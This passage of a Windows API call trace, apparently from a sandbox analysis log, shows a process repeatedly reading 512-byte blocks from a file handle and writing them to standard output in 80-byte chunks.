_get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, 
lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.548] GetFileType (hFile=0x50) returned 0x1 [0134.548] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.549] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.549] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 
[0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.549] GetFileType (hFile=0x50) returned 0x1 [0134.549] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, 
lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.550] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.550] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] GetFileType (hFile=0x50) returned 0x1 [0134.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.550] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.551] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.551] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, 
lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 
| out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] GetFileType (hFile=0x50) returned 0x1 [0134.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.551] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.552] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.552] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] GetFileType (hFile=0x50) returned 0x1 [0134.552] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.552] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 
[0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.553] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.553] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 
[0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] GetFileType (hFile=0x50) returned 0x1 [0134.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.553] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.554] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.554] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, 
lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] GetFileType (hFile=0x50) returned 0x1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.554] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.555] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.555] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType (hFile=0x50) returned 0x1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.555] GetFileType 
